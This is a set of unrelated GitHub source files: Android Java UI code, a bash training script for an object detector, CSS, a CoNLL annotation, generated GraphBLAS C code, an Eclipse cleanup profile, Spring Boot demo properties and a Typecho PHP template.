public SearchFilterController(@NonNull View frame, @Nullable FilterListener listener,
@StringRes int populateButtonText,
@NonNull SearchToolbarController toolbarController)
{
mFrame = frame;
mFilterListener = listener;
mToolbarController = toolbarController;
mToolbarController.addBookingParamsChangedListener(this);
mShowOnMap = mFrame.findViewById(R.id.show_on_map);
mShowOnMap.setText(populateButtonText);
mFilterButton = mFrame.findViewById(R.id.filter_button);
mFilterIcon = mFilterButton.findViewById(R.id.filter_icon);
mFilterText = mFilterButton.findViewById(R.id.filter_text);
mDivider = mFrame.findViewById(R.id.divider);
initListeners();
}
public void show(boolean show, boolean showPopulateButton)
{
UiUtils.showIf(show && (showPopulateButton || mHotelMode), mFrame);
showPopulateButton(showPopulateButton);
}
void showPopulateButton(boolean show)
{
UiUtils.showIf(show, mShowOnMap);
}
void showDivider(boolean show)
{
UiUtils.showIf(show, mDivider);
}
public void updateFilterButtonsVisibility(boolean isHotel)
{
mHotelMode = isHotel;
UiUtils.showIf(isHotel, mFilterButton);
mToolbarController.showFilterControls(isHotel);
}
private void initListeners()
{
mShowOnMap.setOnClickListener(v ->
{
if (mFilterListener != null)
mFilterListener.onShowOnMapClick();
});
mFilterButton.setOnClickListener(v ->
{
if (mFilterListener != null)
mFilterListener.onFilterClick();
});
}
@Nullable
public HotelsFilter getFilter()
{
return mFilter;
}
public void setFilterParams(@Nullable BookingFilterParams params)
{
if (params == null)
return;
mToolbarController.setFilterParams(params);
mBookingFilterParams = params;
}
public void setFilter(@Nullable HotelsFilter filter)
{
mFilter = filter;
if (mFilter != null)
{
mFilterIcon.setOnClickListener(mClearListener);
mFilterIcon.setImageResource(R.drawable.ic_cancel);
mFilterIcon.setColorFilter(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.accentButtonTextColor)));
UiUtils.setBackgroundDrawable(mFilterButton, R.attr.accentButtonRoundBackground);
mFilterText.setTextColor(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.accentButtonTextColor)));
}
else
{
mFilterIcon.setOnClickListener(null);
mFilterIcon.setImageResource(R.drawable.ic_filter_list);
mFilterIcon.setColorFilter(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.colorAccent)));
UiUtils.setBackgroundDrawable(mFilterButton, R.attr.clickableBackground);
mFilterText.setTextColor(ContextCompat.getColor(mFrame.getContext(),
UiUtils.getStyledResourceId(mFrame.getContext(), R.attr.colorAccent)));
}
}
public void resetFilterAndParams()
{
setFilter(null);
resetFilterParams();
updateFilterButtonsVisibility(false);
}
private void resetFilterParams()
{
mToolbarController.resetFilterParams();
mBookingFilterParams = null;
}
@Nullable
public BookingFilterParams getBookingFilterParams()
{
return mBookingFilterParams;
}
public void onSaveState(@NonNull Bundle outState)
{
outState.putParcelable(STATE_HOTEL_FILTER, mFilter);
outState.putParcelable(STATE_FILTER_PARAMS, mBookingFilterParams);
outState.putBoolean(STATE_HOTEL_FILTER_VISIBILITY,
mFilterButton.getVisibility() == View.VISIBLE);
}
public void onRestoreState(@NonNull Bundle state)
{
setFilter(state.getParcelable(STATE_HOTEL_FILTER));
setFilterParams(state.getParcelable(STATE_FILTER_PARAMS));
updateFilterButtonsVisibility(state.getBoolean(STATE_HOTEL_FILTER_VISIBILITY, false));
}
public static class DefaultFilterListener implements FilterListener
{
@Override
public void onShowOnMapClick()
{
}
@Override
public void onFilterClick()
{
}
@Override
public void onFilterClear()
{
}
@Override
public void onFilterParamsChanged()
{
}
}
}
| {
"pile_set_name": "Github"
} |
#!/bin/bash
# Usage:
# ./experiments/scripts/faster_rcnn_alt_opt.sh GPU NET DATASET [options args to {train,test}_net.py]
# DATASET is only pascal_voc for now
#
# Example:
# ./experiments/scripts/faster_rcnn_alt_opt.sh 0 VGG_CNN_M_1024 pascal_voc \
# --set EXP_DIR foobar RNG_SEED 42 TRAIN.SCALES "[400, 500, 600, 700]"
set -x
set -e
export PYTHONUNBUFFERED="True"
GPU_ID=$1
NET=$2
NET_lc=${NET,,}
DATASET=$3
array=( $@ )
len=${#array[@]}
EXTRA_ARGS=${array[@]:3:$len}
EXTRA_ARGS_SLUG=${EXTRA_ARGS// /_}
case $DATASET in
pascal_voc)
TRAIN_IMDB="voc_0712_trainval"
TEST_IMDB="voc_0712_test"
PT_DIR="pascal_voc"
;;
coco)
TRAIN_IMDB="coco_2014_train"
TEST_IMDB="coco_2014_val"
PT_DIR="coco"
ITERS=40000
;;
*)
echo "No dataset given"
exit
;;
esac
LOG="experiments/logs/rfcn_alt_opt_5step_ohem_rpn4_${NET}_${EXTRA_ARGS_SLUG}.txt.`date +'%Y-%m-%d_%H-%M-%S'`"
exec &> >(tee -a "$LOG")
echo Logging output to "$LOG"
time ./tools/train_rfcn_alt_opt_5stage.py --gpu ${GPU_ID} \
--net_name ${NET} \
--weights data/imagenet_models/${NET}-model.caffemodel \
--imdb ${TRAIN_IMDB} \
--imdb_test ${TEST_IMDB} \
--cfg experiments/cfgs/rfcn_alt_opt_5step_ohem.yml \
--model 'rfcn_alt_opt_5step_ohem'
${EXTRA_ARGS}
set +x
NET_FINAL=`grep "Final model" ${LOG} | awk '{print $3}'`
RPN_FINAL=`grep "Final RPN" ${LOG} | awk '{print $3}'`
set -x
time ./tools/test_net.py --gpu ${GPU_ID} \
--def models/${PT_DIR}/${NET}/rfcn_alt_opt_5step_ohem/rfcn_test.pt \
--net ${NET_FINAL} \
--imdb ${TEST_IMDB} \
--rpn_file ${RPN_FINAL} \
--cfg experiments/cfgs/rfcn_alt_opt_5step_ohem.yml \
--num_dets 400
${EXTRA_ARGS}
| {
"pile_set_name": "Github"
} |
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* ColVis styles
*/
div.ColVis {
float: right;
margin-bottom: 1em;
}
button.ColVis_Button,
ul.ColVis_collection li {
position: relative;
float: left;
margin-right: 3px;
padding: 5px 8px;
border: 1px solid #999;
cursor: pointer;
*cursor: hand;
font-size: 0.88em;
color: black !important;
white-space: nowrap;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
-ms-border-radius: 2px;
-o-border-radius: 2px;
border-radius: 2px;
-webkit-box-shadow: 1px 1px 3px #ccc;
-moz-box-shadow: 1px 1px 3px #ccc;
-ms-box-shadow: 1px 1px 3px #ccc;
-o-box-shadow: 1px 1px 3px #ccc;
box-shadow: 1px 1px 3px #ccc;
/* Generated by http://www.colorzilla.com/gradient-editor/ */
background: #ffffff; /* Old browsers */
background: -webkit-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* IE10+ */
background: -o-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* Opera 11.10+ */
background: linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#f9f9f9',GradientType=0 ); /* IE6-9 */
}
.ColVis_Button:hover,
ul.ColVis_collection li:hover {
border: 1px solid #666;
text-decoration: none !important;
-webkit-box-shadow: 1px 1px 3px #999;
-moz-box-shadow: 1px 1px 3px #999;
-ms-box-shadow: 1px 1px 3px #999;
-o-box-shadow: 1px 1px 3px #999;
box-shadow: 1px 1px 3px #999;
background: #f3f3f3; /* Old browsers */
background: -webkit-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* IE10+ */
background: -o-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* Opera 11.10+ */
background: linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f3f3f3', endColorstr='#f4f4f4',GradientType=0 ); /* IE6-9 */
}
button.ColVis_Button {
height: 30px;
padding: 3px 8px;
}
button.ColVis_Button::-moz-focus-inner {
border: none !important;
padding: 0;
}
button.ColVis_Button:active {
outline: none;
}
div.ColVis_collectionBackground {
position: fixed;
top: 0;
left: 0;
height: 100%;
width: 100%;
background-color: black;
z-index: 1100;
}
ul.ColVis_collection {
list-style: none;
width: 150px;
padding: 8px 8px 4px 8px;
margin: 0;
border: 1px solid #ccc;
border: 1px solid rgba( 0, 0, 0, 0.4 );
background-color: #f3f3f3;
background-color: rgba( 255, 255, 255, 0.3 );
overflow: hidden;
z-index: 2002;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
-ms-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
-webkit-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
-moz-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
-ms-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
-o-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
}
ul.ColVis_collection li {
position: relative;
height: auto;
left: 0;
right: 0;
padding: 0.5em;
display: block;
float: none;
margin-bottom: 4px;
-webkit-box-shadow: 1px 1px 3px #999;
-moz-box-shadow: 1px 1px 3px #999;
-ms-box-shadow: 1px 1px 3px #999;
-o-box-shadow: 1px 1px 3px #999;
box-shadow: 1px 1px 3px #999;
}
ul.ColVis_collection li {
text-align: left;
}
ul.ColVis_collection li.ColVis_Button:hover {
border: 1px solid #999;
background-color: #f0f0f0;
}
ul.ColVis_collection li span {
display: inline-block;
padding-left: 0.5em;
cursor: pointer;
}
ul.ColVis_collection li.ColVis_Special {
border-color: #555;
background: rgb(237,237,237); /* Old browsers */
background: -webkit-linear-gradient(top, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, rgba(237,237,237,1) 0%, rgba(214,214,214,1) 77%, rgba(232,232,232,1) 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* IE10+ */
background: -o-linear-gradient(top, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* Opera 11.10+ */
background: linear-gradient(to bottom, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ededed', endColorstr='#e8e8e8',GradientType=0 ); /* IE6-9 */
}
ul.ColVis_collection li.ColVis_Special:hover {
background: #e2e2e2; /* Old browsers */
background: -webkit-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* IE10+ */
background: -o-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* Opera 11.10+ */
background: linear-gradient(to bottom, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f3f3f3', endColorstr='#e2e2e2',GradientType=0 ); /* IE6-9 */
}
span.ColVis_radio {
display: inline-block;
width: 20px;
}
div.ColVis_catcher {
position: absolute;
z-index: 1101;
}
.disabled {
color: #999;
}
| {
"pile_set_name": "Github"
} |
#begin document (wb/sel/26/sel_2693); part 000
wb/sel/26/sel_2693 -1 0 [WORD] NNP (TOP(S(S(NP* - - - - * -
wb/sel/26/sel_2693 -1 1 [WORD] NNP *) - - - - * -
wb/sel/26/sel_2693 -1 2 [WORD] RB (ADVP*) - - - - * -
wb/sel/26/sel_2693 -1 3 [WORD] VBD (VP* punch - 1 - * -
wb/sel/26/sel_2693 -1 4 [WORD] PRP (NP*) - - - - * -
wb/sel/26/sel_2693 -1 5 [WORD] RB (ADVP*) - - - - * -
wb/sel/26/sel_2693 -1 6 [WORD] IN (PP* - - - - * -
wb/sel/26/sel_2693 -1 7 [WORD] DT (NP* - - - - * -
wb/sel/26/sel_2693 -1 8 [WORD] NN *)))) - - - - * -
wb/sel/26/sel_2693 -1 9 [WORD] CC * - - - - * -
wb/sel/26/sel_2693 -1 10 [WORD] PRP (S(NP*) - - - - * -
wb/sel/26/sel_2693 -1 11 [WORD] VBD (VP* - - - - * -
wb/sel/26/sel_2693 -1 12 [WORD] `` * - - - - * -
wb/sel/26/sel_2693 -1 13 [WORD] DT (S(NP* - - - - * -
wb/sel/26/sel_2693 -1 14 [WORD] JJ * - - - - * -
wb/sel/26/sel_2693 -1 15 [WORD] NNS *) - - - - * -
wb/sel/26/sel_2693 -1 16 [WORD] VBP (VP* - - - - * -
wb/sel/26/sel_2693 -1 17 [WORD] RB * - - - - * -
wb/sel/26/sel_2693 -1 18 [WORD] VB (VP* - - - - * -
wb/sel/26/sel_2693 -1 19 [WORD] TO (S(VP* - - - - * -
wb/sel/26/sel_2693 -1 20 [WORD] VB (VP* - - - - * -
wb/sel/26/sel_2693 -1 21 [WORD] RB (ADVP* - - - - * -
wb/sel/26/sel_2693 -1 22 [WORD] IN (PP* - - - - * -
wb/sel/26/sel_2693 -1 23 [WORD] PRP$ (NP* - - - - * -
wb/sel/26/sel_2693 -1 24 [WORD] NN *))))))))))) - - - - * -
wb/sel/26/sel_2693 -1 25 [WORD] . * - - - - * -
wb/sel/26/sel_2693 -1 26 [WORD] '' *)) - - - - * -
#end document
| {
"pile_set_name": "Github"
} |
// +build !race
package mgo
const raceDetector = false
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<profiles version="2">
<profile kind="CleanUpProfile" name="geowave-cleanup" version="2">
<setting id="cleanup.remove_redundant_type_arguments" value="true"/>
<setting id="cleanup.remove_unused_private_fields" value="true"/>
<setting id="cleanup.always_use_parentheses_in_expressions" value="true"/>
<setting id="cleanup.never_use_blocks" value="false"/>
<setting id="cleanup.add_missing_deprecated_annotations" value="true"/>
<setting id="cleanup.remove_unused_private_methods" value="true"/>
<setting id="cleanup.convert_to_enhanced_for_loop" value="false"/>
<setting id="cleanup.remove_unnecessary_nls_tags" value="true"/>
<setting id="cleanup.sort_members" value="false"/>
<setting id="cleanup.remove_unused_local_variables" value="false"/>
<setting id="cleanup.remove_unused_private_members" value="false"/>
<setting id="cleanup.never_use_parentheses_in_expressions" value="false"/>
<setting id="cleanup.remove_unnecessary_casts" value="true"/>
<setting id="cleanup.make_parameters_final" value="true"/>
<setting id="cleanup.use_this_for_non_static_field_access" value="true"/>
<setting id="cleanup.use_blocks" value="true"/>
<setting id="cleanup.remove_private_constructors" value="true"/>
<setting id="cleanup.always_use_this_for_non_static_method_access" value="false"/>
<setting id="cleanup.remove_trailing_whitespaces_all" value="true"/>
<setting id="cleanup.always_use_this_for_non_static_field_access" value="false"/>
<setting id="cleanup.use_this_for_non_static_field_access_only_if_necessary" value="true"/>
<setting id="cleanup.add_default_serial_version_id" value="true"/>
<setting id="cleanup.make_type_abstract_if_missing_method" value="false"/>
<setting id="cleanup.qualify_static_member_accesses_through_subtypes_with_declaring_class" value="true"/>
<setting id="cleanup.make_variable_declarations_final" value="true"/>
<setting id="cleanup.add_missing_nls_tags" value="false"/>
<setting id="cleanup.format_source_code" value="false"/>
<setting id="cleanup.add_missing_override_annotations" value="true"/>
<setting id="cleanup.qualify_static_method_accesses_with_declaring_class" value="false"/>
<setting id="cleanup.remove_unused_private_types" value="true"/>
<setting id="cleanup.convert_functional_interfaces" value="false"/>
<setting id="cleanup.use_anonymous_class_creation" value="false"/>
<setting id="cleanup.use_type_arguments" value="false"/>
<setting id="cleanup.make_local_variable_final" value="true"/>
<setting id="cleanup.add_missing_methods" value="false"/>
<setting id="cleanup.add_missing_override_annotations_interface_methods" value="true"/>
<setting id="cleanup.correct_indentation" value="false"/>
<setting id="cleanup.remove_unused_imports" value="true"/>
<setting id="cleanup.remove_trailing_whitespaces_ignore_empty" value="false"/>
<setting id="cleanup.make_private_fields_final" value="true"/>
<setting id="cleanup.add_generated_serial_version_id" value="false"/>
<setting id="cleanup.organize_imports" value="true"/>
<setting id="cleanup.sort_members_all" value="false"/>
<setting id="cleanup.remove_trailing_whitespaces" value="true"/>
<setting id="cleanup.insert_inferred_type_arguments" value="false"/>
<setting id="cleanup.use_blocks_only_for_return_and_throw" value="false"/>
<setting id="cleanup.use_parentheses_in_expressions" value="true"/>
<setting id="cleanup.add_missing_annotations" value="true"/>
<setting id="cleanup.use_lambda" value="true"/>
<setting id="cleanup.qualify_static_field_accesses_with_declaring_class" value="false"/>
<setting id="cleanup.use_this_for_non_static_method_access_only_if_necessary" value="true"/>
<setting id="cleanup.use_this_for_non_static_method_access" value="true"/>
<setting id="cleanup.qualify_static_member_accesses_through_instances_with_declaring_class" value="true"/>
<setting id="cleanup.add_serial_version_id" value="true"/>
<setting id="cleanup.always_use_blocks" value="true"/>
<setting id="cleanup.qualify_static_member_accesses_with_declaring_class" value="true"/>
<setting id="cleanup.format_source_code_changes_only" value="false"/>
</profile>
</profiles>
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// GB_AxB: hard-coded functions for semiring: C<M>=A*B or A'*B
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_bracket.h"
#include "GB_sort.h"
#include "GB_atomics.h"
#include "GB_AxB_saxpy3.h"
#include "GB_AxB__include.h"
// The C=A*B semiring is defined by the following types and operators:
// A'*B function (dot2): GB_Adot2B__times_isge_uint8
// A'*B function (dot3): GB_Adot3B__times_isge_uint8
// C+=A'*B function (dot4): GB_Adot4B__times_isge_uint8
// A*B function (saxpy3): GB_Asaxpy3B__times_isge_uint8
// C type: uint8_t
// A type: uint8_t
// B type: uint8_t
// Multiply: z = (aik >= bkj)
// Add: cij *= z
// 'any' monoid? 0
// atomic? 1
// OpenMP atomic? 1
// MultAdd: cij *= (aik >= bkj)
// Identity: 1
// Terminal: if (cij == 0) { cij_is_terminal = true ; break ; }
#define GB_ATYPE \
uint8_t
#define GB_BTYPE \
uint8_t
#define GB_CTYPE \
uint8_t
// true for int64, uint64, float, double, float complex, and double complex
#define GB_CTYPE_IGNORE_OVERFLOW \
0
// aik = Ax [pA]
#define GB_GETA(aik,Ax,pA) \
uint8_t aik = Ax [pA]
// bkj = Bx [pB]
#define GB_GETB(bkj,Bx,pB) \
uint8_t bkj = Bx [pB]
#define GB_CX(p) Cx [p]
// multiply operator
#define GB_MULT(z, x, y) \
z = (x >= y)
// cast from a real scalar (or 2, if C is complex) to the type of C
#define GB_CTYPE_CAST(x,y) \
((uint8_t) x)
// multiply-add
#define GB_MULTADD(z, x, y) \
z *= (x >= y)
// monoid identity value
#define GB_IDENTITY \
1
// break if cij reaches the terminal value (dot product only)
#define GB_DOT_TERMINAL(cij) \
if (cij == 0) { cij_is_terminal = true ; break ; }
// simd pragma for dot-product loop vectorization
#define GB_PRAGMA_SIMD_DOT(cij) \
;
// simd pragma for other loop vectorization
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// 1 for the PLUS_PAIR_(real) semirings, not for the complex case
#define GB_IS_PLUS_PAIR_REAL_SEMIRING \
0
// declare the cij scalar
#if GB_IS_PLUS_PAIR_REAL_SEMIRING
// also initialize cij to zero
#define GB_CIJ_DECLARE(cij) \
uint8_t cij = 0
#else
// all other semirings: just declare cij, do not initialize it
#define GB_CIJ_DECLARE(cij) \
uint8_t cij
#endif
// save the value of C(i,j)
#define GB_CIJ_SAVE(cij,p) Cx [p] = cij
// cij = Cx [pC]
#define GB_GETC(cij,pC) \
cij = Cx [pC]
// Cx [pC] = cij
#define GB_PUTC(cij,pC) \
Cx [pC] = cij
// Cx [p] = t
#define GB_CIJ_WRITE(p,t) Cx [p] = t
// C(i,j) += t
#define GB_CIJ_UPDATE(p,t) \
Cx [p] *= t
// x + y
#define GB_ADD_FUNCTION(x,y) \
x * y
// type with size of GB_CTYPE, and can be used in compare-and-swap
#define GB_CTYPE_PUN \
uint8_t
// bit pattern for bool, 8-bit, 16-bit, and 32-bit integers
#define GB_CTYPE_BITS \
0xffL
// 1 if monoid update can skipped entirely (the ANY monoid)
#define GB_IS_ANY_MONOID \
0
// 1 if monoid update is EQ
#define GB_IS_EQ_MONOID \
0
// 1 if monoid update can be done atomically, 0 otherwise
#define GB_HAS_ATOMIC \
1
// 1 if monoid update can be done with an OpenMP atomic update, 0 otherwise
#if GB_MICROSOFT
#define GB_HAS_OMP_ATOMIC \
1
#else
#define GB_HAS_OMP_ATOMIC \
1
#endif
// 1 for the ANY_PAIR semirings
#define GB_IS_ANY_PAIR_SEMIRING \
0
// 1 if PAIR is the multiply operator
#define GB_IS_PAIR_MULTIPLIER \
0
// 1 if monoid is PLUS_FC32
#define GB_IS_PLUS_FC32_MONOID \
0
// 1 if monoid is PLUS_FC64
#define GB_IS_PLUS_FC64_MONOID \
0
// atomic compare-exchange
#define GB_ATOMIC_COMPARE_EXCHANGE(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_8 (target, expected, desired)
#if GB_IS_ANY_PAIR_SEMIRING
// result is purely symbolic; no numeric work to do. Hx is not used.
#define GB_HX_WRITE(i,t)
#define GB_CIJ_GATHER(p,i)
#define GB_HX_UPDATE(i,t)
#define GB_CIJ_MEMCPY(p,i,len)
#else
// Hx [i] = t
#define GB_HX_WRITE(i,t) Hx [i] = t
// Cx [p] = Hx [i]
#define GB_CIJ_GATHER(p,i) Cx [p] = Hx [i]
// Hx [i] += t
#define GB_HX_UPDATE(i,t) \
Hx [i] *= t
// memcpy (&(Cx [p]), &(Hx [i]), len)
#define GB_CIJ_MEMCPY(p,i,len) \
memcpy (Cx +(p), Hx +(i), (len) * sizeof(uint8_t))
#endif
// disable this semiring and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_TIMES || GxB_NO_ISGE || GxB_NO_UINT8 || GxB_NO_TIMES_UINT8 || GxB_NO_ISGE_UINT8 || GxB_NO_TIMES_ISGE_UINT8)
//------------------------------------------------------------------------------
// C=A'*B or C<!M>=A'*B: dot product (phase 2)
//------------------------------------------------------------------------------
GrB_Info GB_Adot2B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix M, const bool Mask_struct,
const GrB_Matrix *Aslice, bool A_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int64_t *GB_RESTRICT B_slice,
int64_t *GB_RESTRICT *C_counts,
int nthreads, int naslice, int nbslice
)
{
// C<M>=A'*B now uses dot3
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_AxB_dot2_meta.c"
#undef GB_PHASE_2_OF_2
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C<M>=A'*B: masked dot product method (phase 2)
//------------------------------------------------------------------------------
GrB_Info GB_Adot3B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix M, const bool Mask_struct,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
const GB_task_struct *GB_RESTRICT TaskList,
const int ntasks,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_AxB_dot3_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C+=A'*B: dense dot product
//------------------------------------------------------------------------------
GrB_Info GB_Adot4B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
int64_t *GB_RESTRICT A_slice, int naslice,
const GrB_Matrix B, bool B_is_pattern,
int64_t *GB_RESTRICT B_slice, int nbslice,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_AxB_dot4_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C=A*B, C<M>=A*B, C<!M>=A*B: saxpy3 method (Gustavson + Hash)
//------------------------------------------------------------------------------
#include "GB_AxB_saxpy3_template.h"
GrB_Info GB_Asaxpy3B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix M, bool Mask_comp, const bool Mask_struct,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
GB_saxpy3task_struct *GB_RESTRICT TaskList,
const int ntasks,
const int nfine,
const int nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_AxB_saxpy3_template.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
| {
"pile_set_name": "Github"
} |
server.port=80
# Data source configuration
spring.datasource.url=jdbc:h2:mem:ssb_test
spring.datasource.driver-class-name=org.h2.Driver
spring.datasource.username=root
spring.datasource.password=root
spring.datasource.schema=classpath:db/schema.sql
spring.datasource.data=classpath:db/data.sql
# With this setting the H2 web console can be accessed remotely; otherwise it is only reachable from the local machine.
spring.h2.console.settings.web-allow-others=true
# With this setting the H2 web console is available at YOUR_URL/h2-console, where YOUR_URL is the base URL of your application.
spring.h2.console.path=/h2-console
# Connection pool configuration
spring.datasource.type=org.apache.commons.dbcp2.BasicDataSource
# Initial size: number of connections created when the pool starts
spring.datasource.dbcp2.initial-size=50
# Max active: largest number of active connections the pool can hand out at the same time; a non-positive value means unlimited
spring.datasource.dbcp2.max-active=250
# Max idle: largest number of idle connections kept in the pool; idle connections beyond this are released; a negative value means unlimited
spring.datasource.dbcp2.max-idle=50
# Min idle: smallest number of idle connections kept in the pool; new connections are created when the count drops below it; 0 means none are created
spring.datasource.dbcp2.min-idle=5
# Max wait: when no connection is available, the longest time (in milliseconds) the pool waits for one to be returned before throwing an exception; -1 means wait forever
spring.datasource.dbcp2.max-wait-millis=10000
# Validation query: SQL used to validate connections taken from the pool before handing them to the caller; if set, it must be a SELECT that returns at least one row
spring.datasource.dbcp2.validation-query=SELECT 1
# Connection properties sent to the JDBC driver when new connections are created, in the form [propertyName=property;]. Note: user/password are passed explicitly, so they do not need to be included here.
spring.datasource.dbcp2.connection-properties=characterEncoding=utf8
# JPA configuration
# Hibernate can maintain the database schema automatically from the entity classes; configure this with spring.jpa.hibernate.ddl-auto, which accepts the following options:
# 1. create: on startup, drop the previously generated tables and recreate them from the entity classes; existing data is wiped.
# 2. create-drop: create the tables from the entity classes on startup and drop them when the sessionFactory closes.
# 3. update: create the tables from the entity classes on startup and update the schema when entity properties change; use this during early development.
# 4. validate: on startup, verify that the entity classes and the tables match; use this once the data structures are stable.
# 5. none: take no action.
spring.jpa.hibernate.ddl-auto=update
# spring.jpa.show-sql makes Hibernate print the actual SQL statements to the console.
spring.jpa.show-sql=true
# Pretty-print the JSON returned by controllers.
spring.jackson.serialization.indent-output=true
# Logging configuration
logging.level.com.xiaolyuh=debug
logging.level.org.springframework.web=debug
logging.level.org.springframework.transaction=debug
logging.level.org.apache.commons.dbcp2=debug
management.port=8081
management.security.enabled=false
endpoints.shutdown.enabled=true
endpoints.beans.id=mybeans
endpoints.beans.enabled=false
endpoints.enabled=true
info.name=\u76D1\u63A7\u6D4B\u8BD5
info.version=1.0
info.autor=wyh
| {
"pile_set_name": "Github"
} |
["a",
4
,1, | {
"pile_set_name": "Github"
} |
<?php
/**
* page.php
*
 * Standalone page
*
* @author 熊猫小A
*/
if (!defined('__TYPECHO_ROOT_DIR__')) exit;
?>
<?php $this->need('head.php'); ?>
<?php $this->need('header.php'); ?>
<div id="main" class="flex flex-1">
<div class="center flex-1">
<!--post-item start-->
<div id="post-list">
<?php if(!$this->have()):?>
<div class="post-item">
<div class="post-item-body" style="padding-top:0.001em"><h1 style="text-align:center;margin-top:40px;color:var(--text-color)">糟糕,是 404 的感觉</h1></div>
</div>
<?php else:?>
<div style="animation-delay:0.2s" class="post-item full">
<?php if($this->fields->type=='1' || !($this->fields->banner && $this->fields->banner!='')): ?>
<div class="post-item-header flex align-items-center" style="padding-bottom:0">
<img class="avatar" src="<?php echo Typecho_Common::gravatarUrl($this->author->mail, 100, '', '', true)?>" />
<div style="font-size: 14px; line-height: 1.5;overflow:hidden" class="post-meta flex flex-direction-column">
<span><b><?php echo $this->author->screenName; ?></b> 发表了一篇<?php if($this->fields->type=='1') echo '说说'; else echo '日志'; ?></span>
<span style="white-space:nowrap;text-overflow:ellipsis;overflow:hidden"><?php Utils::exportPostMeta($this,$this->fields->type); ?></span>
</div>
</div>
<?php elseif($this->fields->banner && $this->fields->banner!='') :?>
<a data-fancybox="gallery" href="<?php echo $this->fields->banner; ?>"><img style="max-width:100%;width:100%" src="<?php echo $this->fields->banner; ?>"/></a>
<?php endif; ?>
<div class="post-item-body <?php if($this->fields->banner && $this->is('index')) echo 'pull-left'; if($this->is('index')&&($this->fields->indextype=='1')) echo ' featured';?> flex">
<article class="yue">
<?php if(!($this->fields->type=='1')): ?>
<h1 class="post-title"><?php $this->title();?>
